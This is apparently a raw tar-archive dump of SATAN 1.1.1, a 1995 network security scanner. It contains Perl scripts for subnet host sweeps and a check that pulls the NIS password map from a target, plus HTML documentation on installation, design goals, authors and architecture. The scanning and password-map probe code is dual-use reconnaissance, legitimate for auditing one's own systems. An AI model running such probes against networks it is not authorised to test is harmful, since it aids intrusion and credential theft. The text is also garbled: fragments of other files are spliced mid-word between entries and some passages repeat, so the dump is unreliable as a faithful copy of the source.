,$target); .# If everything fails, just output what we can: .if ($fqdn eq "satan-1.1.1/bin/faux_fping.......................................................................... 700 . 465 . 506 . 363 5742457415 10512. ...................................................................................... ................................................................................................................................................................................................................................................................. .............#!/usr/local/bin/perl5 # # fping replacement that skips unresolvable hosts. # $running_under_satan = 1; require 'perl/get_host.pl'; require 'config/paths.pl'; $timeout = 5; for (@ARGV) { system("$PING $_ $timeout") if &get_host_name($_); } emote ypbind daemon may fall behind so far that it runs out of file # descriptors. This can be fixed by inserting sleep() calls. $running_under_satan = 1; require 'config/paths.pl'; require 'perl/fix_hostname.pl'; require 'perl/misc.pl'; require 'perllib/getopts.pl'satan-1.1.1/bin/get_targets......................................................................... 755 . 465 . 506 . 3115 5742457415 10724. ......................................................................... ................................................................................................................................................................................................................................................................. ..........................#!/usr/local/bin/perl5 # # Scan a subnet for live hosts # # If given IP address or hostname, scan everything on that subnet. # If given partial IP address (e.g. 140.174.97), do the same. # # Method used: # # Use fping to scan the net; any hits send to gethostbyaddr to # get the hostname. This will print out a list of hostname and/or # IP addresses that are alive, one per line. # require 'config/paths.pl'; require 'perl/socket.pl';.# work around socket.ph problems $name = $ARGV[0]; if (! $name) { die "Usage: $0 network-address\n"; } # # hostname? if ($name !~ /[0-9]+\.[0-9]+\.[0-9]+/) { .($name, $aliases, $type, $len, @ip) = gethostbyname($name); .($a,$b,$c,$d) = unpack('C4',$ip[0]); .$name = "$a.$b.$c"; .} # # IP addr? If four octets, chop off the last one if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) { .($name) = ($name =~ /^([0-9]+\.[0-9]+\.[0-9]+)\.[0-9]+/); .} # 3 octets of an ip address: if ($name =~ /^[0-9]+\.[0-9]+\.[0-9]+$/) { .for $i (1..255) { $args .= "$name.$i "; } .} else { die "Can't figure out what to scan ($name)\n"; } # spawn off fping, look at results die "Can't execute $FPING" unless open(FPING, "$FPING $args |"); while (<FPING>) { .chop; .($target, $result) = /(\S+)\s+(.*)$/; .if ($_ =~ /is unreachable/) { next; } .if ($_ =~ /is alive/) { ..($a,$b,$c,$d) = split(/\./, $target); ..@ip = ($a,$b,$c,$d); ..# Hack alert!! Some libcs dump when ahost has many addresses. ..if (fork() == 0) { ...($name) = gethostbyaddr(pack("C4", @ip), &AF_INET); ...if ($name) { print "$name\n"; } ...else { print "$target\n"; } ...exit; ...} ..else { wait; } ..} .} close(FPING); utput = "$guess $nis_server"; .$text = "$nis_server serves nis domain $guess for $target"; .&satan_print(); .exit; } close (YPWHICH); } # All out guesses failed. $text = "unable to guess nis domain name of $target"; &satan_print(); exit; >) { .chop; .next unless /(\S+):(\S+)/; .($host = $1) =~ tr/A-Z/a-z/; .$path = $2; .$fqdn = &fix_hostname($host ,$target); .# If everything fails, just output what we can: .if ($fqdn eq "satan-1.1.1/bin/yp-chk.satan........................................................................ 700 . 465 . 506 . 2153 5742457417 10705. ...................................................................................... ................................................................................................................................................................................................................................................................. .............#!/usr/local/bin/perl5 # # Query the NIS server. # $running_under_satan = 1; require 'config/satan.cf'; require 'config/paths.pl'; require 'perl/misc.pl'; require 'perl/hostname.pl'; require 'perl/getfqdn.pl'; require 'perllib/getopts.pl'; $usage="Usage: $0 [-t timeout -u -v] domain target\n"; $opt_u = $untrusted_host; &Getopts("t:uv") || die $usage; $timeout = $short_timeout; ($#ARGV == 1) || die $usage; $domain = $ARGV[0]; $target = $ARGV[1]; $flags = "-v" if defined($opt_v); $timeout = $opt_t if defined($opt_t); $untrusted_host = $opt_u; $flags = "$flags -t $timeout"; $service = &basename($0, ".satan"); $severity = "x"; $status = "a"; $service_output = ""; $| = 1; $command = "$YP_CHK $flags $domain passwd.byname $target"; print "$command\n" if $opt_v; open(YP, "$command |") || die "$0: cannot run yp-chk"; while(<YP>) { .if (defined($opt_v)) { . print; .} .if ($untrusted_host && /:.*:.*:.*:.*:.*:/) { ..$trusted = "ANY\@ANY"; ..$severity = "us"; ..$trustee = "user\@$target"; ..$service_output = "NIS password file access"; ..$text = $service_output; ..&satan_print(); .} .# Other NIS problems later. } open(FPING, "$FPING $args |"); while (<FPING>) { .chop; .($target, $result) = /(\S+)\s+(.*)$/; .if ($_ =~ /is unreachable/) { next; } .if ($_ =~ /is alive/) { ..($a,$b,$c,$d) = split(/\./, $target); ..@ip = ($a,$b,$c,$d); ..# Hack alert!! Some libcs dump when ahost has many addresses. ..if (fork() == 0) { ...($name) = gethostbyaddr(pack("C4", @ip), &AF_INET); ...if ($name) { print "$name\n"; } ...elsesatan-1.1.1/html/................................................................................... 700 . 465 . 506 . 0 5742521547 6561. .............................................................................................. ................................................................................................................................................................................................................................................................. .....satan-1.1.1/html/docs/.............................................................................. 700 . 465 . 506 . 0 5742521540 7502. ................................................................................................ ................................................................................................................................................................................................................................................................. ...satan-1.1.1/html/docs/acknowledgements.html......................................................... 600 . 465 . 506 . 4615 5737213127 14022. .................................................................................................. ................................................................................................................................................................................................................................................................. .<HTML> <HEAD> <title>Acknowledgements</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H2>Acknowledgements</H2> <HR> Acknowledgements and Dedications <P> We'd like to thank Larry Wall for PERL and the WWW folks for their great software that we hammered into our user interface. Many thanks go to Neil Gaiman for supplying us with original artwork for the project. <p> Dan thanks Muffy for her faith in SATAN (that does sound a bit odd) and for the inspiring name. <p> Last, but not least, our wonderful beta testers and general help-givers and such, with their affiliations (In alphabetical order) <UL> <LI>Eric Allman, University of California at Berkeley <LI>Australian Computer Emergency Response Team (AUSCERT) <LI>Walter Belgers, Philips Communications and Processing Services <LI>Steve Bellovin, Bell Laboratories <LI>Terry Bernstein, SRI <LI>Mike Blakele, PC Week <LI>Bill Cheswick, Bell Laboratories <LI>Computer Emergency Response Team (CERT) <LI>Computer Incident Advisory Capability (CIAC) <LI>Lionel Cons, CERN <LI>Rich R Cower, Intel Incorporated <LI>Kay Dekker, University of Coventry <LI>Sean Doran, Sprint <LI>Dale Drew, MCI <LI>Stephen Hansen, Stanford University <LI>LaMont Jones, HP <LI>Chris LaFournaise, Sequent Computer Systems, Inc. <LI>John Larson, Xerox Parc <LI>Eliot Lear, Silicon Graphics, Inc. <LI>William LeFebvre, Gene Rackow, Argonne National Laboratories <LI>Jason Martin Levitt <LI>Wolfgang Ley, DFN-CERT <LI>John Matzka, Sequent Computer Systems, Inc. <LI>DaVe McComb, Goldman Sachs <LI>Dan Mosedale, Netscape Communications Corporation <LI>Alec Muffett, Sun Microsystems <LI>Teun Nijssen, CERT-NL <LI>Personnel of the Purdue COAST Laboratory, and the graduate intrusion detection class: Taimur Aslam, Mark Crosbie, Bryn Dole, Ivan Krsul, Sandeep Kumar, Steve Lodin, Christoph Schuba, Mihai Sirbu and Gene Spafford <LI>Personnel of the University of Oslo: Anders Odberg, Knut Borge, Morten Hanshaugen, Olav Kolbu <LI>Jeff Polk, BSDI <LI>Brad Powell, Sun Microsystems <LI>Marcus J. Ranum, Trusted Information Systems <LI>Brian Reid, DEC <LI>Steve Romig, Ohio State University <LI>Shabbir Safdar, Goldman Sachs <LI>Jeff Sedayao, Intel Corporation <LI>David HM Spector, J.P. Morgan <LI>Kevin Steves, HP <LI>Peter Shipley <LI>Eamonn Sullivan, PC Week <LI>Lloyd Taylor <LI>Nicholas R Trio, IBM <LI>Cheryl Trooskin <LI>Mark Verber, Xerox Parc <LI>Steve Whitlock, Boeing </UL> </BODY> </HTML> hanger = (\S+)/; .$pref =~ s/,//; .$me{$me} = $pref; .} if ($_ =~ /mail addr/) { ($ma{$target}) = /mail addr = (\Ssatan-1.1.1/html/docs/satan_reference.html.......................................................... 600 . 465 . 506 . 5407 5740021464 13607. ........................................... ................................................................................................................................................................................................................................................................. ........................................................<HTML> <HEAD> <title> SATAN Reference </title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]"> SATAN Reference </H1> <H2>(Security Administrator Tool for Analyzing Networks)</H2> <HR> <OL> <p> <LI><A HREF="the_main_parts.html"><STRONG>SATAN Architecture</STRONG></A> <OL> <LI><A HREF="the_main_parts.html#general">Architecture overview</A> <LI><A HREF="the_main_parts.html#crypto-ignition">Magic cookie generator</A> <LI><A HREF="the_main_parts.html#policy-engine">Policy engine</A> <LI><A HREF="the_main_parts.html#proximity-levels">Proximity levels</A> <LI><A HREF="the_main_parts.html#target-acquisition">Target acquisition</A> <LI><A HREF="the_main_parts.html#subnet-scan">Subnet scan</A> <LI><A HREF="the_main_parts.html#data-acquisition">Data acquisition</A> <LI><A HREF="the_main_parts.html#scanning-levels">Scanning levels</A> <LI><A HREF="the_main_parts.html#inference-engine">Inference engine</A> <LI><A HREF="the_main_parts.html#report-analysis">Reporting and Analysis</A> </OL> <p> <LI><A HREF="user_interface.html"><STRONG>The SATAN User Interface</STRONG></A> <OL> <LI><A HREF="user_interface.html#basics">The Basics</A> <LI><A HREF="user_interface.html#gathering-data">Gathering Data</A> <LI><A HREF="user_interface.html#data-mgmt">Data Management</A> <LI><A HREF="user_interface.html#looking">Looking at and understanding the results</A> <LI><A HREF="user_interface.html#tricky-implications">Hints, Further tricky security implications, or Getting The Big Picture (tm)</A> <LI><A HREF="user_interface.html#command-line">The Command-line Interface</A> </OL> <p> <LI><A HREF="satan.cf.html"><strong>The most important file of all - satan.cf</strong></A> <p> <LI><A HREF="satan.db.html"><strong>The SATAN database record format</strong></A> <OL> <LI><A HREF="satan.db.html#facts"><strong>facts</strong> - just the facts, m'am</A> <LI><A HREF="satan.db.html#all-hosts"><strong>all-hosts</strong> - all the hosts seen</A> <LI><A HREF="satan.db.html#todo"><strong>todo</strong> - all the things it did</a> </OL> <p> <LI><A HREF="satan.rules.html"><strong>SATAN Rulesets - what makes SATAN Go</strong></A> <OL> <LI><A HREF="satan.rules.html#drop">Overriding/dropping SATAN data</A> <LI><A HREF="satan.rules.html#facts">Generating new facts</A> <LI><A HREF="satan.rules.html#hosttype">Ascertaining host types</A> <LI><A HREF="satan.rules.html#services">Determining network services</A> <LI><A HREF="satan.rules.html#todo">Creating internal task lists</A> <LI><A HREF="satan.rules.html#trust">Trust relation classification</A> </OL> <p> <LI><A HREF="satan.probes.html"><strong>Adding your own probes and vulnerabilities</strong></A> </OL> <p> <hr> <a href="../satan_documentation.html"> Back to the Documentation TOC</a> </BODY> </HTML> is $MOSAIC\n"; .$upper{"MOSAIC"} = $MOSAIC; .} else { print "Cannot find a web browser! SATAN cannot be run except in CLI"; } print "\nSo far so good...\nLooking for all the commands now...\n"; for $command (@all_commands) { .$found=""; .for $disatan-1.1.1/html/docs/authors.html.................................................................. 600 . 465 . 506 . 3055 5736744274 12165. ............................................................................................. ................................................................................................................................................................................................................................................................. ......<HTML> <HEAD> <title>Author, authors!</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <h2><IMG SRC="../images/satan-almost-full.gif" ALT="[SATAN IMAGE]"> Authors</H2> <HR> <strong>Dan Farmer</strong> <P> <A HREF="http://www.fish.com/fish.com/dan.html">dan</A> is a computer spy and master procrastinator (just ask wietse!) that hacks mostly Unix stuff in awk, perl, shell, and C. He lives in San Francisco, California, USA, is a professional slacker, and is lucky enough to be able to live in an electronic age that permits him to work with wietse. <P> <strong>Wietse Venema</strong> <P> <A HREF="http://www.win.tue.nl/win/math/bs/wietse"> Wietse</A> is a Unix guru who lives in <A HREF="http://www.ic.gov/94fact/country/171.html">the Netherlands</A> and works for the <A HREF="http://www.tue.nl"> Eindhoven University of Technology</A>. He is having several professional lives, and in his spare time likes to write amazing <a href="ftp://ftp.win.tue.nl/pub/security/index.html">tools and papers.</a> </DL> <p> <HR> E-mail to both authors can be sent to <A HREF="mailto:satan@fish.com">satan@fish.com</A> (or click on the e-mail address.) We'll try to answer it, but please be aware that we only work on SATAN in our (very) part time. You might also try posting to <I>comp.security.unix</I> for answers. Failing either of these, you can send mail directly to dan: <p> <ADDRESS><A HREF="mailto:zen@fish.com">zen@fish.com</A></ADDRESS> <p> or Wietse: <p> <ADDRESS><A HREF="mailto:wietse@wzv.win.tue.nl">wietse@wzv.win.tue.nl</A></ADDRESS> </BODY> </HTML> interface.html#command-line">The Command-line Interface</A> </OL> <p> <LI><A HREF="satan.cf.html"><strong>The most important file of all - satan.cf</strong></A> <p> <LI><A HREF="satan.db.html"><strong>The SATAN database record format</strong></A> <OL> <LI><A HREF="satan.db.html#facts"><strong>facts</strong> - just the facts, m'am</A> <LI><A HREF="satan.db.html#all-hosts"><strong>all-hosts</strong> - all the hosts seen</A> <LI><A HREF="satan.db.html#todo"><stronsatan-1.1.1/html/docs/copyright.html................................................................ 600 . 465 . 506 . 2441 5736744274 12506. .............................................................. ................................................................................................................................................................................................................................................................. .....................................<HTML> <HEAD> <title>Copyright</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H2>Copyright</H2> <HR> <P> Copyright 1995 by Dan Farmer and Wietse Venema. All rights reserved. Some individual files may be covered by other copyrights (this will be noted in the file itself.) <P> Redistribution and use in source and binary forms are permitted provided that this entire copyright notice is duplicated in all such copies. No charge, other than an "at-cost" distribution fee, may be charged for copies, derivations, or distributions of this material without the express written consent of the copyright holders. <P> THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR ANY PARTICULAR PURPOSE. <P> IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, LOSS OF USE, DATA, OR PROFITS OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. </BODY> </HTML> x</I> for answers. Failing either of these, you can send mail directly to dan: <p> <ADDRESS><A HREF="mailto:zen@fish.com">zen@fish.com</A></ADDRESS> <p> or Wietse: <p> <ADDRESS><A HREF="mailto:wietse@wzv.win.tue.nl">wietse@satan-1.1.1/html/docs/design.html................................................................... 600 . 465 . 506 . 5274 5737562775 11763. .............................................. ................................................................................................................................................................................................................................................................. .....................................................<HTML> <HEAD> <title>Design Goals</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Design Goals</H1> <HR> <P> SATAN was not built to solve any single problem; rather, it was built as a research tool, to see what would happen if freely available state of the art software tools were merged with as much security knowledge as we could pool together were crammed into one (at least semi-)cohesive package. Our design goals were: <UL> <LI>Discover if the problem of mapping out the security of large networks was a solvable problem. <LI>Use the traditional Unix toolbox approach of program design. <LI>Use as many freely available software tools that were currently useful and available, to cut down development time to a minimum. <LI>Design a security package that was educational as well as useful. <LI>Create a tool that was freely available to anyone who wanted to use it. <LI>Discover and uncover as much security and network information as possible without being destructive. <LI>Create the best (and, at the creation/development stages, quite nearly the only) investigative security network tool available, at any price. <LI>Spur further program development (commercial or academic) in this very rich area. <LI>Show just how insecure the Internet really is, and how much every site depends on a large number of potentially insecure other sites. </UL> <P> <A NAME="toolkit"><H3>Toolkit approach</H3></A> It would be impossible to write all of the functionality necessary to make SATAN work, with only two (very!) part-time programmers. We decided from the start to steal as much information, tools, and methodologies (we have no shame!) as possible to create SATAN. In particular, using perl and the HTML interface were vital to the completion of the package. It would be wonderful if we could have a mapping program to graphically display the results, but we haven't found anything suitable so far. <P> <A NAME="speed-optimization"><H3>Speed/optimization</H3></A> Optimizing SATAN for speed of execution was not much of a design consideration. It was designed to be an information gathering tool that would be run periodically; a fairly large network (say, a thousand nodes) can be scanned in several hours. In all likelihood, the majority of time consumed when using SATAN will be deciding on what actions to take based on the results that were found. In any case, the network timeouts and uncertainties make real optimization very difficult. Fortunately, perl was fast enough (thanks, Larry!) to make performance a non-issue for most network queries and work. <hr> <a href="satan_overview.html"> Back to the Introductory TOC/Index</a> </BODY> </HTML> an_documentation.html"> Back to the Documentation TOC</a> </BODY> </HTML> is $MOSAIC\n"; .$upper{"MOSAIC"} = $MOSAIC; .} else { print "Cannot find a web browser! SATAN cannot be run except in CLI"; } print "\nSo far so good...\nLooking for all the commands now...\n"; for $command (@all_commands) { .$found=""; .for $disatan-1.1.1/html/docs/quotes.html................................................................... 600 . 465 . 506 . 1773 5741330116 12003. ............................................................................................. ................................................................................................................................................................................................................................................................. ......<HTML> <HEAD> <title>Quotes about SATAN</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H2><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Quotes about SATAN</H2> <HR> <H3>Pre-release:</H3> <p> "It's like randomly mailing automatic rifles to 5,000 addresses. I hope some crazy teen doesn't get a hold of one." (Oakland tribune.) <p> "SATAN is like a gun, and this is like handing a gun to a 12-year-old." (LA times.) <p> "It's like distributing high-powered rocket launchers throughout the world, free of charge, available at your local library or school, and inviting people to try them out by shooting at somebody." (San jose mercury.) <p> "It discovers vulnerabilities for which we have no solutions." (The New York Times.) <p> "...people could die." (vikr@aol.com (VikR)) <p> <H3>Post-release:</H3> <p> "...there is no obscuring its presence. It announces itself like a rock concert to the scanned machine's log file." (Nick Christenson, npc@minotaur.jpl.nasa.gov) </BODY> </HTML> as psatan-1.1.1/html/docs/getting_started.html.......................................................... 600 . 465 . 506 . 7413 5741742562 13663. .................................................................................................... ................................................................................................................................................................................................................................................................< HTML> <HEAD> <title>Getting started!</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Getting started</H1> <HR> <p> <A NAME="what-you-need"><H3>What you need to do to .run SATAN even if you don't want to read documentation</H3></A> In a nutshell, all you really have to do is type <I>make</I>, edit the configuration file <A HREF="satan.cf.html">(config/satan.cf)</A> if desired, and then run SATAN; to use the HTML interface to run SATAN you may simply type <I>satan</I>, then use <I>SATAN Target selection</I> to choose a target. To run SATAN from the command line you would type something like <I>satan victim.com</I>. <p> <STRONG> Remember - you should run SATAN as "root"!</STRONG> <p> After the probe is done, you can then go into the HTML interface (again, just type <I>satan</I>), go to the <I>SATAN Reporting & Data Analysis</I> section. Look at the <I>Vulnerabilities</I> section first, then examine the other methods (<I>Information</I> and <I>Trust</I>). <p> <STRONG>One important caveat!</STRONG> <p> Remember, if you have the <i>tcpd wrappers</i> or some other mechanism that does a reverse finger, turn off that feature before running SATAN! There is a reasonable chance that someone else out on the network will have the same feature turned on, and you do NOT want to enter into a "finger war" or infinite loop of fingers going back and forth between you and your targets, each of you slowly getting buried in mail and/or logs. Make sure to turn it back on after finishing the data collection, of course! <p> <A NAME="getting-n-compiling"><H3>Getting and compiling .all those programs if you don't have them already</H3></A> You'll need <i>perl5</i> (see <A HREF="system_requirements.html#other-requirements"> system requirements</A>) as well as a C compiler to get SATAN running properly. To compile and prepare SATAN, look at the <A HREF="../tutorials/first_time/make.html"> first section</A> of the SATAN tutorial. <p> <A NAME="satan-files"><H3>What are all the files for?</H3></A> SATAN creates and uses quite a few files, but a user typically only has to really be concerned with one - the configuration file, (<A HREF="satan.cf.html">config/satan.cf</A>.) Besides the program files that actually run SATAN, the following files are read or generated by SATAN: <OL> <li><i>bin/*</i> These are the programs that SATAN depends on for data acquisition. <li><i>config/*</i> Configuration files that SATAN need to find other programs, and for default settings. <li><I>html/*</I>. All of these files are either <i>html</i> pages or <i>perl</i> programs to generate the pages for the user interface. <li><i>perl/*</i> Code modules used by either SATAN or by the data acquisition tools. <li><I>results/database-name</i>. SATAN databases. Each database is made up of three files: <ol> <li><I>all-hosts</I>. This is a list of all the hosts that SATAN found out about during the scan, including hosts that it never touched. <li><I>facts</I>. This is a list of all the output records emitted by the <i>*.satan</i> tools. These records are what gets processed by SATAN to generate the reports. <li><i>todo</I>. This lists all the hosts and probes that SATAN actually ran against the hosts. With this table, SATAN knows what probes it can skip when you scan the hosts again. </OL> <li><I>rules/*</I>. The rules that SATAN uses to assess the situation and infer facts from the existing information. Extremely flexible (simply <i>perl</i> code that is interpreted), this is one of the most powerful features of SATAN. See the <A HREF="satan.rules.html">rules</A> section for more. <li><i>src/*</i> The source code to some of the SATAN support programs. </OL> <hr> <a href="satan_overview.html"> Back to the Introductory TOC/Index</a> </BODY> </HTML> on the network will have the same feature turned on, and you do NOT want to enter into a "finger war" or infinite loop of fingers going back and forth between you and your targets, each of you slowly getting buried in mail and/or logs. Make sursatan-1.1.1/html/docs/intro.html.................................................................... 600 . 465 . 506 . 6451 5737562571 11635. ................................................. ................................................................................................................................................................................................................................................................. ..................................................<HTML> <HEAD> <title> Introduction</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Introduction</H1> <HR> <P> <A NAME="what-is-satan"><H3>What is SATAN?</H3></a> <p> SATAN is the Security Analysis Tool for Auditing Networks. In its simplest (and default) mode, it gathers as much information about remote hosts and networks as possible by examining such network services as finger, NFS, NIS, ftp and tftp, rexd, and other services. The information gathered includes the presence of various network information services as well as potential security flaws -- usually in the form of incorrectly setup or configured network services, well-known bugs in system or network utilities, or poor or ignorant policy decisions. It can then either report on this data or use a simple rule-based system to investigate any potential security problems. Users can then examine, query, and analyze the output with an HTML browser, such as Mosaic, Netscape, or Lynx. While the program is primarily geared towards analyzing the security implications of the results, a great deal of general network information can be gained when using the tool - network topology, network services running, types of hardware and software being used on the network, etc. <p> However, the real power of SATAN comes into play when used in exploratory mode. Based on the initial data collection and a user configurable ruleset, it will examine the avenues of trust and dependency and iterate further data collection runs over secondary hosts. This not only allows the user to analyze her or his own network or hosts, but also to examine the real implications inherent in network trust and services and help them make reasonably educated decisions about the security level of the systems involved. <p> <A NAME="who-should-use"><H3>Who should use SATAN?</H3></a> SATAN should prove to be most useful when used by the system or security administrators who own or are responsible for the security of the systems involved. However, since it is freely available and will probably see widespread use throughout the Internet community, it should be used by anyone who is concerned about the security of their systems, since potential intruders will be able to access the same security vulnerability information and since it is quite likely that it will uncover security problems that were previously unknown. <p> <A NAME="how-does-it-work"><H3>How does it work?</H3></a> SATAN has a target acquisition program that uses <I>fping</I> to determine whether or not a host or set of hosts in a subnet are alive. It then passes this target list to an engine that drives the data collection and the main feedback loop. Each host is examined to see if it has been seen before, and, if not, a list of tests/probes is run against it (the set of tests depends on the distance the host is from the initial target and what probe level has been set.) The tests emit a data record that has the hostname, the test run, and any results found from the probe; this data is saved in files for analysis. The user interface uses HTML to link the often vast amounts of data to more coherent and palatable results that the user can readily digest and understand. <hr> <a href="satan_overview.html"> Back to the Introductory TOC/Index</a> </BODY> </HTML> ever, the real power of SATAN comes into play when used in exploratory mode. Based on the initial data collection and a user configurable ruleset, it will examine the avenues of trust and dependency and iterate fursatan-1.1.1/html/docs/references.html............................................................... 600 . 465 . 506 . 3345 5736744274 12623. ........................................................................... ................................................................................................................................................................................................................................................................. ........................<HTML> <HEAD> <title>SATAN References/Bibliography</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H2>Bibliography</H2> <HR> <P> Baldwin, Robert W., <CITE> Rule Based Analysis of Computer Security</CITE>, Massachusetts Institute of Technology, June 1987. <P> Bellovin, Steve, <CITE> Using the Domain Name System for System Break-ins</CITE>, 1992 (unpublished). <P> Farmer, Dan, and Venema, Wietse, <A HREF="admin_guide_to_cracking.html"> <CITE> Improving the Security of Your Site by Breaking Into it</CITE></A>, comp.security.unix, December 1993. <P> Massachusetts Institute of Technology, <CITE> X Window System Protocol</CITE>, Version 11, 1990. <P> Shimomura, Tsutomu, <CITE> private communication</CITE>. <P> Sun Microsystems, <CITE> OpenWindows V3.0.1 User Commands</CITE>, March 1992. <P> Bellovin, Steve, <CITE> Security Problems in the TCP/IP Protocol Suite</CITE>, Computer Communication Review 19 (2), 1989; a comment by Stephen Kent appears in volume 19 (3), 1989. <P> Garfinkel, Simson and Spafford, Gene, <CITE> Practical UNIX Security</CITE>, O'Reilly and Associates, Inc., 1992. <P> Hess, David, Safford, David, and Pooch, Udo, <CITE> A UNIX Network Protocol Study: Network Information Service</CITE>, Computer Communication Review 22 (5) 1992. <P> Phreak Accident, <CITE> Playing Hide and Seek, UNIX style</CITE>, Phrack, Volume Four, Issue Forty-Three, File 14 of 27. <P> Ranum, Marcus, <CITE> Firewalls internet electronic mailing list</CITE>, Sept 1993. <P> Schuba, Christoph, <CITE> Addressing Weaknesses in the Domain Name System Protocol</CITE>, Purdue University, August 1993. <P> Thompson, Ken, <CITE> Reflections on Trusting Trust</CITE>, Communications of the ACM 27 (8), 1984. </BODY> </HTML> ably educated decisions about the security level of the systems involved. <p> <A NAME="who-should-use"><H3>Who should use SATAN?</H3></a> SATAN should prove to be most useful when used by the system or security administrators who own or are responsible for the security of the systemsatan-1.1.1/html/docs/system_requirements.html...................................................... 600 . 465 . 506 . 7040 5740013004 14574. ............................................................................................... ................................................................................................................................................................................................................................................................. ....<HTML> <HEAD> <title>System Requirements</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">System Requirements</H1> <HR> <P> Unfortunately SATAN isn't as portable as we would like it to be, but it still will run on a fairly large number of Un*x machines. One of the main problems we had is that for it to do all of the tasks that we wanted and to actually be able to release it within any reasonable time frame, we had to both rely on many other publically available tools and forego much of our usual testing methodologies. Still under development, and most often used by us as a research and discovery tool, it will become more robust and portable as we get feedback and are able to test it on more platforms ourselves. <A NAME="OS"><h3>Operating systems</h3></A> Currently SATAN is known to work on the following Operating Systems: <UL> <LI>SunOS 4.1.3_U1 <LI>SunOS 5.3 <LI>Irix 5.3 </UL> <A NAME="Hardware"><h3>Hardware platforms</h3></A> SATAN has been tested with the following machines: <UL> <LI>SPARCstation 4/75 <LI>SPARCstation 5 <LI>Indigo 2 </UL> However, it should run on quite a few more; try typing <i>make</i> for a list of the ones we think it'll work on (currently, this is AIX, BSD types, IRIX5, HP-UX 9.x, SunOS 4 & 5, SYSV-R4, Ultrix 4.x, and maybe, just maybe, with a bit of tweaking, Linux.) <A NAME="diskspace"><h3>Disk space</h3></A> Approximately 20 megabytes of total space is needed to install all of the supplementary packages and the SATAN program. The bulk of this is due to the other software packages, chiefly Mosaic or netscape (5.5 MB or 2.5 MB on a sun) and perl5 (10 MB); SATAN itself takes up about two megabytes of space, including the documentation. If the supplementary programs are already installed, it isn't necessary to reinstall them. If you use the binaries only, it can be as small as 5 MB for a full installation. <A NAME="memory"><h3>Memory</h3></A> Memory is another issue - this is very dependent on how many hosts you're scanning in or are in your database, but rest assured, SATAN is a <STRONG>real</STRONG> pig when it comes to memory. From our experiences: <p> With approximately 1500 hosts scanned, with approximately 18000 facts in the facts file took about 14 megabytes of memory on a SPARC 4/75 running SunOS 4.1.3. <p> With approximately 4700 hosts scanned, with about 150000 facts, it took up almost 35 megabytes of memory on an Indigo 2. <p> Needless to say, swapping is very painful if you don't have enough memory. <P> <A NAME="other-requirements"> <h3>Other software tools required and where you can get them</h3></A> <p> We realize that you may not have all of the additional software required to run SATAN already on your system. If you're not on the Internet, we're sorry but we currently do not have the resources to help you get all of these programs. Perhaps at some point a tape or CD distribution could be made (probably by a 3rd party) if the demand is high enough. <p> Although all of it is widely and freely available on the Internet, on a wide number of sites, here are some easy places to find perl, mosaic, and netscape: <p> <a name="perl"></a> <a name="Mosaic"></a> <UL> <li> <a href="ftp://ftp.cis.ufl.edu/pub/perl/src/5.0/perl5.000.tar.gz"> Perl, version 5.001</a></li> <li> <a href="ftp://ftp.ncsa.uiuc.edu/Mosaic/Unix"> Mosaic, version 2.5</a></li> <li> <a href="ftp://ftp.netscape.com/netscape/unix"> Netscape, version 1.0</a></li> </UL> <p> <hr> <a href="satan_overview.html"> Back to the Introductory TOC/Index</a> </BODY> </HTML> irements</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">System Requirements</H1> <HR> <P> Unfortunately SATAN isn't as portable as we would like it to be, but it still will run on a fairly large number of Un*x machines. One of the main problems we had is that for it to do all of the tasks that we wanted and to actually be able to release it within any reasonable time frame, we had to both rely on msatan-1.1.1/html/docs/the_main_parts.html........................................................... 600 . 465 . 506 . 32571 5740013366 13504. ................................................................. ................................................................................................................................................................................................................................................................. ..................................<HTML> <HEAD> <title>SATAN Architecture</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">SATAN Architecture</H1> <hr> <h3><a name="general">Architecture Overview </a></h3> SATAN has an extensible architecture. At the center is a relatively small generic kernel that knows little to nothing about system types, network service names, vulnerabilities, or other details. Knowledge about the details of network services, system types, etc. is built into small, dedicated, data collection tools and rule bases. The behaviour of SATAN is controlled from a configuration file. Settings may be overruled via command-line options of via a hypertext user interface. <p> The SATAN kernel consists of the following main parts: <dl> <p><dt><a href="#crypto-ignition>Magic cookie generator</a><dd> Each time SATAN is started up in interactive mode, the magic cookie generator generates a pseudorandom string that the HTML browser must send to the SATAN custom http server as part of all commands. <p><dt><a href="#policy-engine">Policy engine</a>. <dd>Given the constraints specified in the SATAN <a href="satan.cf.html"> configuration file,</a> this subsystem determines whether a host may be scanned, and what <a 